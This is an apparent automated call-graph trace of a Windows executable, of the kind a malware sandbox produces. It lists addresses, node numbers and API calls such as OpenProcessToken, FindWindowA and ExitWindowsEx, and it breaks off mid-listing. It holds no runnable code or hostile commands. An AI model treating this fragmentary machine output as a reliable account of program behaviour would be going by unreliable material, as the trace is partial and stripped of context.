11140f92 97998->97999 98003 11140fa9 std::_Mutex::_Mutex 97998->98003 98074 110290c0 265 API calls 2 library calls 97999->98074 98002 11141137 98004 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98002->98004 98003->98002 98005 11140fdc GetModuleFileNameA 98003->98005 98006 1112fdea wsprintfA 98004->98006 98049 11080c50 98005->98049 98022 1113f5d0 98006->98022 98008 11140ff1 98009 11141001 SHGetFolderPathA 98008->98009 98021 111410e8 98008->98021 98011 1114102e 98009->98011 98012 1114104d SHGetFolderPathA 98009->98012 98010 1113e630 std::_Mutex::_Mutex 262 API calls 98010->98002 98011->98012 98015 11141034 98011->98015 98014 11141082 std::_Mutex::_Mutex 98012->98014 98053 1102a220 98014->98053 98075 110290c0 265 API calls 2 library calls 98015->98075 98019 11141093 98019->98019 98056 11140a10 98019->98056 98021->98010 98021->98021 98023 1113f5f1 CreateFileA 98022->98023 98025 1113f68e CloseHandle 98023->98025 98026 1113f66e 98023->98026 98029 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98025->98029 98027 1113f672 CreateFileA 98026->98027 98028 1113f6ab 98026->98028 98027->98025 98027->98028 98031 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98028->98031 98030 1113f6a7 98029->98030 98030->97981 98032 1113f6ba 98031->98032 98032->97981 98034 110b69c3 GetModuleHandleA GetProcAddress 98033->98034 98035 110b6a84 98033->98035 98036 110b6a0a GetCurrentProcessId OpenProcess 98034->98036 98037 110b69ef GetCurrentProcessId 98034->98037 98035->97987 98038 110b6a57 98036->98038 98039 110b6a27 OpenProcessToken 98036->98039 98040 110b69f8 98037->98040 98044 110b6a73 CloseHandle 98038->98044 98045 110b6a76 98038->98045 98039->98038 98041 110b6a38 98039->98041 98040->98036 98043 110b69fc 98040->98043 98041->98038 98042 110b6a3f GetTokenInformation 98041->98042 98042->98038 98043->97987 98044->98045 98046 110b6a7a CloseHandle 98045->98046 98047 110b6a7d 98045->98047 98046->98047 98047->98035 98048->97997 98050 11080c63 _strrchr 98049->98050 98052 11080c7a std::_Mutex::_Mutex 98050->98052 98076 11080aa0 IsDBCSLeadByte 98050->98076 98052->98008 98077 11028260 98053->98077 98055 1102a22e 98055->98019 98057 11140a9a 98056->98057 98058 11140a1b 98056->98058 98057->98021 98058->98057 98058->98058 98059 11140a2b GetFileAttributesA 98058->98059 98060 11140a45 98059->98060 98061 11140a37 98059->98061 98062 11161cea __strdup 66 API calls 98060->98062 98061->98021 98063 11140a4c 98062->98063 98064 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 98063->98064 98065 11140a56 98064->98065 98066 11140a10 std::_Mutex::_Mutex 67 API calls 98065->98066 98073 11140a73 98065->98073 98067 11140a66 98066->98067 98068 11140a7c 98067->98068 98069 11140a6e 98067->98069 98070 1115f2c5 _free 66 API calls 98068->98070 98071 1115f2c5 _free 66 API calls 98069->98071 98072 11140a81 CreateDirectoryA 98070->98072 98071->98073 98072->98073 98073->98021 98076->98052 98078 11028283 98077->98078 98079 110288cb 98077->98079 98080 11028340 GetModuleFileNameA 98078->98080 98089 110282b8 98078->98089 98082 11028967 98079->98082 98083 1102897a 98079->98083 98081 11028361 _strrchr 98080->98081 98088 1116067b std::_Mutex::_Mutex 143 API calls 98081->98088 98084 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98082->98084 98085 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98083->98085 98086 11028976 98084->98086 98087 1102898b 98085->98087 98086->98055 98087->98055 98090 1102833b 98088->98090 98089->98089 98091 1116067b std::_Mutex::_Mutex 143 API calls 98089->98091 98090->98079 98107 110264a0 81 API calls 2 library calls 98090->98107 98091->98090 98093 110283b4 98094 1115f4c7 std::_Mutex::_Mutex 79 API calls 98093->98094 98104 11028835 98093->98104 98096 110283c5 98094->98096 98096->98104 98108 11026310 66 API calls 3 library calls 98096->98108 98098 110283f0 98109 110264a0 81 API calls 2 library calls 98098->98109 98100 11028400 std::_Mutex::_Mutex 98100->98104 98110 110264a0 81 API calls 2 library calls 98100->98110 98102 11028423 __mbschr_l 98102->98104 98106 11160d5e 85 API calls _LangCountryEnumProc@4 98102->98106 98111 11026310 66 API calls 3 library calls 98102->98111 98112 110264a0 81 API calls 2 library calls 98102->98112 98113 11160445 98104->98113 98106->98102 98107->98093 98108->98098 98109->98100 98110->98102 98111->98102 98112->98102 98114 11160451 __setmbcp 98113->98114 98115 11160463 98114->98115 98116 11160478 98114->98116 98148 111659cf 66 API calls __getptd_noexit 98115->98148 98124 11160473 __setmbcp 98116->98124 98126 11167679 98116->98126 98119 11160468 98149 1116a5e4 11 API calls __mbsupr_s_l 98119->98149 98124->98079 98127 111676ad EnterCriticalSection 98126->98127 98128 1116768b 98126->98128 98130 11160491 98127->98130 98128->98127 98129 11167693 98128->98129 98131 1116fdec __lock 66 API calls 98129->98131 98132 111603d8 98130->98132 98131->98130 98133 111603fd 98132->98133 98134 111603e9 98132->98134 98140 111603f9 98133->98140 98151 11167757 98133->98151 98184 111659cf 66 API calls __getptd_noexit 98134->98184 98136 111603ee 98185 1116a5e4 11 API calls __mbsupr_s_l 98136->98185 98150 111604b1 LeaveCriticalSection LeaveCriticalSection _fgets 98140->98150 98143 11165967 __flsbuf 66 API calls 98144 11160417 98143->98144 98161 1116d6b4 98144->98161 98146 1116041d 98146->98140 98147 1115f2c5 _free 66 API calls 98146->98147 98147->98140 98148->98119 98149->98124 98150->98124 98152 11167770 98151->98152 98156 11160409 98151->98156 98153 11165967 __flsbuf 66 API calls 98152->98153 98152->98156 98154 1116778b 98153->98154 98186 1116e8f4 97 API calls 6 library calls 98154->98186 98157 1116d778 98156->98157 98158 11160411 98157->98158 98159 1116d788 98157->98159 98158->98143 98159->98158 98160 1115f2c5 _free 66 API calls 98159->98160 98160->98158 98162 1116d6c0 __setmbcp 98161->98162 98163 1116d6e3 98162->98163 98164 1116d6c8 98162->98164 98165 1116d6ef 98163->98165 98170 1116d729 98163->98170 98187 111659e2 66 API calls __getptd_noexit 98164->98187 98189 111659e2 66 API calls __getptd_noexit 98165->98189 98168 1116d6cd 98188 111659cf 66 API calls __getptd_noexit 98168->98188 98169 1116d6f4 98190 111659cf 66 API calls __getptd_noexit 98169->98190 98173 111730e5 ___lock_fhandle 68 API calls 98170->98173 98175 1116d72f 98173->98175 98174 1116d6fc 98191 1116a5e4 11 API calls __mbsupr_s_l 98174->98191 98177 1116d73d 98175->98177 98178 1116d749 98175->98178 98181 1116d618 __close_nolock 69 API calls 98177->98181 98192 111659cf 66 API calls __getptd_noexit 98178->98192 98180 1116d6d5 __setmbcp 98180->98146 98182 1116d743 98181->98182 98193 1116d770 LeaveCriticalSection __unlock_fhandle 98182->98193 98184->98136 98185->98140 98186->98156 98187->98168 98188->98180 98189->98169 98190->98174 98191->98180 98192->98182 98193->98180 98194 111584f0 98195 11158504 98194->98195 98196 111584fc 98194->98196 98197 1115f88b _calloc 66 API calls 98195->98197 98198 11158518 98197->98198 98199 11158524 98198->98199 98200 11158650 98198->98200 98206 11158130 CoInitializeSecurity CoCreateInstance 98198->98206 98202 1115f2c5 _free 66 API calls 98200->98202 98203 11158678 98202->98203 98204 11158541 98204->98200 98205 11158634 SetLastError 98204->98205 98205->98204 98207 111581a5 wsprintfW SysAllocString 98206->98207 98208 11158324 98206->98208 98212 111581eb 98207->98212 98209 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98208->98209 98211 11158350 98209->98211 98210 11158311 SysFreeString 98210->98208 98211->98204 98212->98210 98212->98212 98213 1115827c 98212->98213 98214 1115826a wsprintfW 98212->98214 98222 111582f9 98212->98222 98223 11096560 98213->98223 98214->98213 98216 1115828e 98217 11096560 266 API calls 98216->98217 98218 111582a3 98217->98218 98228 11096620 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 98218->98228 98220 111582e7 98229 11096620 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 98220->98229 98222->98210 98224 1110c4b0 std::_Mutex::_Mutex 265 API calls 98223->98224 98225 11096593 98224->98225 98226 110965a6 SysAllocString 98225->98226 98227 110965c4 _com_util::ConvertStringToBSTR 98225->98227 98226->98227 98227->98216 98228->98220 98229->98222 98230 1102ce84 98231 1102ce91 98230->98231 98232 1102ceb2 98231->98232 98317 1109e270 275 API calls std::_Mutex::_Mutex 98231->98317 98318 11028ae0 455 API calls std::_Mutex::_Mutex 98232->98318 98235 1102cec3 98300 11027cd0 SetEvent 98235->98300 98237 1102cec8 98238 1102ced2 98237->98238 98239 1102cedd 98237->98239 98319 110ea630 1019 API calls 98238->98319 98241 1102cefa 98239->98241 98242 1102ceff 98239->98242 98320 11058ae0 SetEvent 98241->98320 98244 1102cf07 98242->98244 98245 1102cf3e 98242->98245 98244->98245 98251 1102cf33 Sleep 98244->98251 98246 11142790 std::_Mutex::_Mutex 21 API calls 98245->98246 98247 1102cf48 98246->98247 98248 1102cf55 98247->98248 98249 1102cf86 98247->98249 98248->98247 98252 1105d350 79 API calls 98248->98252 98250 1102cf83 98249->98250 98301 110af030 98249->98301 98250->98249 98251->98245 98253 1102cf78 98252->98253 98253->98249 98321 1102cbe0 294 API calls std::_Mutex::_Mutex 98253->98321 98260 1102cfca 98261 1102cfdd 98260->98261 98323 11132790 299 API calls 5 library calls 98260->98323 98262 1100d4f0 FreeLibrary 98261->98262 98264 1102d2e9 98262->98264 98265 1100d210 wsprintfA 98264->98265 98271 1102d300 98264->98271 98266 1102d2f5 98265->98266 98268 11142790 std::_Mutex::_Mutex 21 API calls 98266->98268 98267 1102d327 GetModuleFileNameA GetFileAttributesA 98269 1102d34f 98267->98269 98299 1102d443 98267->98299 98268->98271 98272 1110c4b0 std::_Mutex::_Mutex 265 API calls 98269->98272 98270 11142790 std::_Mutex::_Mutex 21 API calls 98273 1102d4f2 98270->98273 98271->98267 98271->98299 98274 1102d356 98272->98274 98334 11142750 FreeLibrary 98273->98334 98324 1113ee00 98274->98324 98276 1102d4fa 98278 1102d536 98276->98278 98281 1102d524 ExitWindowsEx 98276->98281 98282 1102d514 ExitWindowsEx Sleep 98276->98282 98279 1102d546 98278->98279 98280 1102d53b Sleep 98278->98280 98283 11142790 std::_Mutex::_Mutex 21 API calls 98279->98283 98280->98279 98281->98278 98282->98281 98284 1102d550 ExitProcess 98283->98284 98286 1102d378 98287 1113ef50 86 API calls 98286->98287 98288 1102d39d 98287->98288 98289 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 98288->98289 98288->98299 98290 1102d3b3 98289->98290 98291 1102d3ce _memset 98290->98291 98332 110290c0 265 API calls 2 library calls 98290->98332 98293 1102d3e8 FindFirstFileA 98291->98293 98294 1102d408 FindNextFileA 98293->98294 98296 1102d428 FindClose 98294->98296 98297 1102d434 98296->98297 98333 11123690 291 API calls 5 library calls 98297->98333 98299->98270 98300->98237 98335 1107f700 98301->98335 98306 1102cfaa 98310 110e8cf0 98306->98310 98307 110af077 98347 110290c0 265 API calls 2 library calls 98307->98347 98311 110af030 267 API calls 98310->98311 98312 110e8d1d 98311->98312 98363 110e80c0 98312->98363 98316 1102cfb5 98322 110af220 267 API calls std::_Mutex::_Mutex 98316->98322 98317->98232 98318->98235 98319->98239 98320->98242 98321->98250 98322->98260 98323->98261 98325 1113ee48 98324->98325 98328 1113ee0e 98324->98328 98326 1113e630 std::_Mutex::_Mutex 265 API calls 98325->98326 98327 1113ee50 98326->98327 98327->98286 98328->98325 98329 1113ee32 98328->98329 98376 1113e6b0 267 API calls std::_Mutex::_Mutex 98329->98376 98331 1113ee38 98331->98286 98333->98299 98334->98276 98336 1107f724 98335->98336 98337 1107f73f 98336->98337 98338 1107f728 98336->98338 98340 1107f73c 98337->98340 98341 1107f758 98337->98341 98348 110290c0 265 API calls 2 library calls 98338->98348 98340->98337 98349 110290c0 265 API calls 2 library calls 98340->98349 98344 110af020 98341->98344 98350 110803e0 98344->98350 98351 1108042d 98350->98351 98352 11080401 98350->98352 98355 1108047a wsprintfA 98351->98355 98356 11080455 wsprintfA 98351->98356 98352->98351 98353 1108041b 98352->98353 98354 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98353->98354 98357 11080429 98354->98357 98362 110290c0 265 API calls 2 library calls 98355->98362 98356->98351 98357->98306 98357->98307 98365 110e80cb 98363->98365 98364 110e8165 98373 110af220 267 API calls std::_Mutex::_Mutex 98364->98373 98365->98364 98366 110e80ee 98365->98366 98368 110e8105 98365->98368 98374 110290c0 265 API calls 2 library calls 98366->98374 98369 110e8102 98368->98369 98370 110e8132 SendMessageTimeoutA 98368->98370 98369->98368 98375 110290c0 265 API calls 2 library calls 98369->98375 98370->98364 98373->98316 98376->98331 98377 6beb63a0 98382 6beb6350 98377->98382 98380 6beb63a9 WSACancelBlockingCall 98381 6beb63b1 Sleep 98383 6beb638d 98382->98383 98386 6bed28e1 98383->98386 98385 6beb6397 98385->98380 98385->98381 98387 6bed28e9 98386->98387 98388 6bed28eb IsDebuggerPresent 98386->98388 98387->98385 98394 6bee4e77 98388->98394 98391 6bed8bba SetUnhandledExceptionFilter UnhandledExceptionFilter 98392 6bed8bdf GetCurrentProcess TerminateProcess 98391->98392 98393 6bed8bd7 __call_reportfault 98391->98393 98392->98385 98393->98392 98394->98391 98395 6bed5ae6 98396 6bed5af6 98395->98396 98397 6bed5af1 98395->98397 98401 6bed59f0 98396->98401 98409 6bedf28f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 98397->98409 98400 6bed5b04 98402 6bed59fc 98401->98402 98406 6bed5a99 98402->98406 98407 6bed5a49 ___DllMainCRTStartup 98402->98407 98410 6bed588c 98402->98410 98404 6bed5a79 98405 6bed588c __CRT_INIT@12 145 API calls 98404->98405 98404->98406 98405->98406 98406->98400 98407->98404 98407->98406 98408 6bed588c __CRT_INIT@12 145 API calls 98407->98408 98408->98404 98409->98396 98411 6bed5898 98410->98411 98412 6bed591a 98411->98412 98413 6bed58a0 98411->98413 98415 6bed597b 98412->98415 98416 6bed5920 98412->98416 98463 6bed607f HeapCreate 98413->98463 98417 6bed59d9 98415->98417 98418 6bed5980 98415->98418 98421 6bed593e 98416->98421 98430 6bed58a9 98416->98430 98521 6bed5e35 11 API calls _doexit 98416->98521 98417->98430 98540 6bed70ad 40 API calls __freefls@4 98417->98540 98526 6bed6da9 TlsGetValue DecodePointer TlsSetValue 98418->98526 98419 6bed58a5 98419->98430 98464 6bed7127 GetModuleHandleW 98419->98464 98424 6bed5952 98421->98424 98522 6bed9b09 26 API calls _free 98421->98522 98525 6bed5965 29 API calls __mtterm 98424->98525 98426 6bed5985 98527 6bedd3f5 98426->98527 98427 6bed58b5 __RTC_Initialize 98438 6bed58c5 GetCommandLineA 98427->98438 98455 6bed58b9 98427->98455 98430->98407 98433 6bed5948 98523 6bed6dfa 29 API calls _free 98433->98523 98434 6bed599d DecodePointer 98439 6bed59b2 98434->98439 98437 6bed594d 98524 6bed609d HeapDestroy 98437->98524 98489 6bedf016 GetEnvironmentStringsW 98438->98489 98442 6bed59cd 98439->98442 98443 6bed59b6 98439->98443 98534 6bed1bfd 98442->98534 98533 6bed6e37 13 API calls 2 library calls 98443->98533 98448 6bed59bd GetCurrentThreadId 98448->98430 98450 6bed58ea 98517 6bedef5b 96 API calls 3 library calls 98450->98517 98451 6bed58e3 98516 6bed6dfa 29 API calls _free 98451->98516 98454 6bed58ef 98456 6bed5903 98454->98456 98518 6bedecd4 97 API calls 5 library calls 98454->98518 98515 6bed609d HeapDestroy 98455->98515 98462 6bed5908 98456->98462 98520 6bed9b09 26 API calls _free 98456->98520 98459 6bed58f8 98459->98456 98519 6bed5c32 EncodePointer __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 98459->98519 98460 6bed5918 98460->98451 98462->98430 98463->98419 98465 6bed713b 98464->98465 98466 6bed7144 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 98464->98466 98541 6bed6dfa 29 API calls _free 98465->98541 98469 6bed718e TlsAlloc 98466->98469 98468 6bed7140 98468->98427 98471 6bed729d 98469->98471 98472 6bed71dc TlsSetValue 98469->98472 98471->98427 98472->98471 98473 6bed71ed 98472->98473 98542 6bed5b5e __initp_misc_winsig EncodePointer EncodePointer __init_pointers 98473->98542 98475 6bed71f2 EncodePointer EncodePointer EncodePointer EncodePointer 98543 6bedf32a InitializeCriticalSectionAndSpinCount 98475->98543 98477 6bed7231 98478 6bed7298 98477->98478 98479 6bed7235 DecodePointer 98477->98479 98545 6bed6dfa 29 API calls _free 98478->98545 98481 6bed724a 98479->98481 98481->98478 98482 6bedd3f5 __calloc_crt 25 API calls 98481->98482 98483 6bed7260 98482->98483 98483->98478 98484 6bed7268 DecodePointer 98483->98484 98485 6bed7279 98484->98485 98485->98478 98486 6bed727d 98485->98486 98544 6bed6e37 13 API calls 2 library calls 98486->98544 98488 6bed7285 GetCurrentThreadId 98488->98471 98491 6bedf032 WideCharToMultiByte 98489->98491 98494 6bed58d5 98489->98494 98492 6bedf09f FreeEnvironmentStringsW 98491->98492 98493 6bedf067 98491->98493 98492->98494 98546 6bedd3b0 62 API calls _malloc 98493->98546 98502 6bed98c4 GetStartupInfoW 98494->98502 98496 6bedf06d 98496->98492 98497 6bedf075 WideCharToMultiByte 98496->98497 98498 6bedf087 98497->98498 98499 6bedf093 FreeEnvironmentStringsW 98497->98499 98500 6bed1bfd _free 25 API calls 98498->98500 98499->98494 98501 6bedf08f 98500->98501 98501->98499 98503 6bedd3f5 __calloc_crt 25 API calls 98502->98503 98512 6bed98e2 98503->98512 98504 6bed58df 98504->98450 98504->98451 98505 6bed9a8d GetStdHandle 98508 6bed9a57 98505->98508 98506 6bedd3f5 __calloc_crt 25 API calls 98506->98512 98507 6bed9af1 SetHandleCount 98507->98504 98508->98505 98508->98507 98509 6bed9a9f GetFileType 98508->98509 98513 6bed9ac5 InitializeCriticalSectionAndSpinCount 98508->98513 98509->98508 98510 6bed9a0e InitializeCriticalSectionAndSpinCount 98510->98504 98514 6bed99d7 98510->98514 98511 6bed9a03 GetFileType 98511->98510 98511->98514 98512->98504 98512->98506 98512->98508 98512->98514 98513->98504 98513->98508 98514->98508 98514->98510 98514->98511 98515->98430 98516->98455 98517->98454 98518->98459 98519->98456 98520->98460 98521->98421 98522->98433 98523->98437 98524->98424 98525->98430 98526->98426 98530 6bedd3fe 98527->98530 98529 6bed5991 98529->98430 98529->98434 98530->98529 98531 6bedd41c Sleep 98530->98531 98547 6beda082 98530->98547 98532 6bedd431 98531->98532 98532->98529 98532->98530 98533->98448 98535 6bed1c08 HeapFree 98534->98535 98536 6bed1c31 __dosmaperr 98534->98536 98535->98536 98537 6bed1c1d 98535->98537 98536->98430 98558 6bed60f9 25 API calls __getptd_noexit 98537->98558 98539 6bed1c23 GetLastError 98539->98536 98540->98430 98541->98468 98542->98475 98543->98477 98544->98488 98545->98471 98546->98496 98548 6beda08e 98547->98548 98552 6beda0a9 98547->98552 98549 6beda09a 98548->98549 98548->98552 98556 6bed60f9 25 API calls __getptd_noexit 98549->98556 98551 6beda0bc RtlAllocateHeap 98551->98552 98554 6beda0e3 98551->98554 98552->98551 98552->98554 98557 6bed622a DecodePointer 98552->98557 98553 6beda09f 98553->98530 98554->98530 98556->98553 98557->98552 98558->98539 98559 111031c0 GetTickCount EnterCriticalSection GetTickCount 98560 11103213 98559->98560 98561 11103208 98559->98561 98563 11103232 98560->98563 98564 1110328a GetTickCount LeaveCriticalSection 98560->98564 98562 11142790 std::_Mutex::_Mutex 21 API calls 98561->98562 98562->98560 98567 11103250 GetTickCount LeaveCriticalSection 98563->98567 98596 110290c0 265 API calls 2 library calls 98563->98596 98565 111032b0 EnterCriticalSection 98564->98565 98566 111032a2 98564->98566 98571 111032d9 98565->98571 98570 11142790 std::_Mutex::_Mutex 21 API calls 98566->98570 98568 11103273 98567->98568 98569 11103268 98567->98569 98574 11142790 std::_Mutex::_Mutex 21 API calls 98569->98574 98575 111032ad 98570->98575 98576 111032e3 98571->98576 98577 11103304 98571->98577 98574->98568 98575->98565 98579 1110337e LeaveCriticalSection 98576->98579 98580 111032ee 98576->98580 98578 1110c4b0 std::_Mutex::_Mutex 265 API calls 98577->98578 98581 1110330e 98578->98581 98597 110290c0 265 API calls 2 library calls 98580->98597 98584 11103327 98581->98584 98598 110ee9b0 InitializeCriticalSection InterlockedIncrement InterlockedIncrement CreateEventA 98581->98598 98587 11103334 98584->98587 98588 1110334b 98584->98588 98585 1110337b 98585->98579 98599 110290c0 265 API calls 2 library calls 98587->98599 98600 1113a660 266 API calls 3 library calls 98588->98600 98592 11103360 98601 11101b40 67 API calls std::ios_base::_Ios_base_dtor 98592->98601 98594 1110336f 98595 11142790 std::_Mutex::_Mutex 21 API calls 98594->98595 98595->98585 98598->98584 98600->98592 98601->98594 98602 11112c20 98603 111416c0 std::_Mutex::_Mutex 90 API calls 98602->98603 98604 11112c3e 98603->98604 98605 11112c65 98604->98605 98607 11112c48 98604->98607 98611 11141440 std::_Mutex::_Mutex 90 API calls 98604->98611 98606 11112c74 CoInitialize CoCreateInstance 98605->98606 98605->98607 98608 11112ca4 LoadLibraryA 98606->98608 98609 11112c99 98606->98609 98610 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98607->98610 98608->98609 98612 11112cc0 GetProcAddress 98608->98612 98616 11112d81 CoUninitialize 98609->98616 98617 11112d87 98609->98617 98613 11112c56 98610->98613 98611->98605 98614 11112cd0 SHGetSettings 98612->98614 98615 11112ce4 FreeLibrary 98612->98615 98614->98615 98615->98609 98616->98617 98618 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98617->98618 98619 11112d96 98618->98619 98620 111700e5 98621 11167e95 __getptd 66 API calls 98620->98621 98622 11170102 _LcidFromHexString 98621->98622 98623 1117010f GetLocaleInfoA 98622->98623 98624 11170136 98623->98624 98625 11170142 98623->98625 98627 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98624->98627 98643 11160d5e 85 API calls 2 library calls 98625->98643 98629 111702b2 98627->98629 98628 1117014e 98630 11170158 GetLocaleInfoA 98628->98630 98641 11170188 _LangCountryEnumProc@4 _strlen 98628->98641 98630->98624 98631 11170177 98630->98631 98644 11160d5e 85 API calls 2 library calls 98631->98644 98632 111701fb GetLocaleInfoA 98632->98624 98634 1117021e 98632->98634 98646 11160d5e 85 API calls 2 library calls 98634->98646 98636 11170231 _strlen 98636->98624 98648 1117008a GetLocaleInfoW _GetPrimaryLen _strlen 98636->98648 98637 11170182 98637->98641 98645 1115fe64 85 API calls 2 library calls 98637->98645 98639 11170229 98639->98624 98639->98636 98647 11160d5e 85 API calls 2 library calls 98639->98647 98641->98624 98641->98632 98643->98628 98644->98637 98645->98641 98646->98639 98647->98636 98648->98624 98649 1102fb50 GetWindowRect 98650 1102fdc7 98649->98650 98651 1102fbc4 98649->98651 98652 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98650->98652 98651->98650 98653 1102fbcc GetWindowLongA 98651->98653 98654 1102fde4 98652->98654 98653->98650 98655 1102fbe6 GetClassNameA 98653->98655 98656 1102fc00 98655->98656 98656->98650 98657 1102fc2d GetWindowThreadProcessId OpenProcess 98656->98657 98657->98650 98658 1102fc59 98657->98658 98679 11025980 LoadLibraryA 98658->98679 98660 1102fc64 98680 110259b0 98660->98680 98662 1102fc83 98663 1102fdaf CloseHandle 98662->98663 98665 110ce2d0 265 API calls 98662->98665 98663->98650 98664 1102fdc0 FreeLibrary 98663->98664 98664->98650 98666 1102fc9d 98665->98666 98690 110cddf0 86 API calls std::_Mutex::_Mutex 98666->98690 98668 1102fcb1 98669 1102fda0 98668->98669 98670 1102fcbe 98668->98670 98677 1102fcfb 98668->98677 98671 110ce380 265 API calls 98669->98671 98672 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 98670->98672 98671->98663 98673 1102fccc 98672->98673 98674 11142790 std::_Mutex::_Mutex 21 API calls 98673->98674 98675 1102fcf0 98674->98675 98691 111253c0 276 API calls 4 library calls 98675->98691 98677->98669 98678 11142790 std::_Mutex::_Mutex 21 API calls 98677->98678 98678->98675 98679->98660 98681 110259be GetProcAddress 98680->98681 98682 110259cf 98680->98682 98681->98682 98683 110259e8 98682->98683 98684 110259dc K32GetProcessImageFileNameA 98682->98684 98686 110259ee GetProcAddress 98683->98686 98687 110259ff 98683->98687 98684->98683 98685 11025a21 98684->98685 98685->98662 98686->98687 98688 11025a06 98687->98688 98689 11025a17 SetLastError 98687->98689 98688->98662 98689->98685 98690->98668 98691->98669 98692 1102dff0 98693 1102e033 98692->98693 98694 1110c4b0 std::_Mutex::_Mutex 265 API calls 98693->98694 98695 1102e03a 98694->98695 98696 1113ee00 267 API calls 98695->98696 98697 1102e05a 98695->98697 98696->98697 98698 1113ef50 86 API calls 98697->98698 98699 1102e084 98698->98699 98700 1102e0b1 98699->98700 98701 11080cc0 86 API calls 98699->98701 98703 1113ef50 86 API calls 98700->98703 98702 1102e096 98701->98702 98704 11080cc0 86 API calls 98702->98704 98705 1102e0da 98703->98705 98704->98700 98706 1115f4c7 std::_Mutex::_Mutex 79 API calls 98705->98706 98710 1102e0e7 98705->98710 98706->98710 98707 1102e116 98708 1102e188 98707->98708 98709 1102e16f GetSystemMetrics 98707->98709 98714 1102e1a2 CreateEventA 98708->98714 98709->98708 98711 1102e17e 98709->98711 98710->98707 98712 11141440 std::_Mutex::_Mutex 90 API calls 98710->98712 98713 11142790 std::_Mutex::_Mutex 21 API calls 98711->98713 98712->98707 98713->98708 98715 1102e1b5 98714->98715 98716 1102e1c9 98714->98716 99678 110290c0 265 API calls 2 library calls 98715->99678 98718 1110c4b0 std::_Mutex::_Mutex 265 API calls 98716->98718 98719 1102e1d0 98718->98719 98720 1102e1f0 98719->98720 98721 1110d180 426 API calls 98719->98721 98722 1110c4b0 std::_Mutex::_Mutex 265 API calls 98720->98722 98721->98720 98723 1102e204 98722->98723 98724 1110d180 426 API calls 98723->98724 98725 1102e224 98723->98725 98724->98725 98726 1110c4b0 std::_Mutex::_Mutex 265 API calls 98725->98726 98727 1102e2a3 98726->98727 98728 1102e2d3 98727->98728 98729 110605c0 301 API calls 98727->98729 98730 1110c4b0 std::_Mutex::_Mutex 265 API calls 98728->98730 98729->98728 98731 1102e2ed 98730->98731 98732 1102e312 FindWindowA 98731->98732 98733 11060230 293 API calls 98731->98733 98735 1102e467 98732->98735 98736 1102e34b 98732->98736 98733->98732 98737 11060a10 268 API calls 98735->98737 98736->98735 98739 1102e363 GetWindowThreadProcessId 98736->98739 98738 1102e479 98737->98738 98740 11060a10 268 API calls 98738->98740 98741 11142790 std::_Mutex::_Mutex 21 API calls 98739->98741 98742 1102e485 98740->98742 98743 1102e389 OpenProcess 98741->98743 98744 11060a10 268 API calls 98742->98744 98743->98735 98746 1102e3a9 98743->98746 98745 1102e491 98744->98745 98747 1102e4a8 98745->98747 98748 1102e49f 98745->98748 99679 11093b90 105 API calls 98746->99679 99079 11141cb0 98747->99079 99680 110279a0 119 API calls 2 library calls 98748->99680 98751 1102e3c8 98754 11142790 std::_Mutex::_Mutex 21 API calls 98751->98754 98752 1102e4a4 98752->98747 98756 1102e3dc 98754->98756 98755 1102e4b7 99094 11141160 ExpandEnvironmentStringsA 98755->99094 98757 1102e41b CloseHandle FindWindowA 98756->98757 98758 11142790 std::_Mutex::_Mutex 21 API calls 98756->98758 98759 1102e443 GetWindowThreadProcessId 98757->98759 98760 1102e457 98757->98760 98762 1102e3ee SendMessageA WaitForSingleObject 98758->98762 98759->98760 98763 11142790 std::_Mutex::_Mutex 21 API calls 98760->98763 98762->98757 98765 1102e40e 98762->98765 98766 1102e464 98763->98766 98768 11142790 std::_Mutex::_Mutex 21 API calls 98765->98768 98766->98735 98767 1113f5d0 std::_Mutex::_Mutex 8 API calls 98769 1102e4da 98767->98769 98770 1102e418 98768->98770 98771 1102e5b1 98769->98771 99107 110623a0 98769->99107 98770->98757 99122 110270d0 98771->99122 98775 110b69b0 std::_Mutex::_Mutex 9 API calls 98777 1102e5d6 std::_Mutex::_Mutex 98779 1102a220 std::_Mutex::_Mutex 145 API calls 98777->98779 98788 1102e5f1 98777->98788 98782 1102e5ea 98779->98782 98785 1102a220 std::_Mutex::_Mutex 145 API calls 98782->98785 98785->98788 99142 11027de0 98788->99142 99080 11140f70 std::_Mutex::_Mutex 265 API calls 99079->99080 99081 11141ccb wsprintfA 99080->99081 99082 11140f70 std::_Mutex::_Mutex 265 API calls 99081->99082 99083 11141ce7 wsprintfA 99082->99083 99084 1113f5d0 std::_Mutex::_Mutex 8 API calls 99083->99084 99085 11141d04 99084->99085 99086 11141d30 99085->99086 99087 1113f5d0 std::_Mutex::_Mutex 8 API calls 99085->99087 99088 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99086->99088 99089 11141d19 99087->99089 99090 11141d3c 99088->99090 99089->99086 99091 11141d20 99089->99091 99090->98755 99092 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99091->99092 99093 11141d2c 99092->99093 99093->98755 99095 11141197 99094->99095 99096 111411b4 std::_Mutex::_Mutex 99095->99096 99097 111411ce 99095->99097 99106 111411a4 99095->99106 99100 111411c5 GetModuleFileNameA 99096->99100 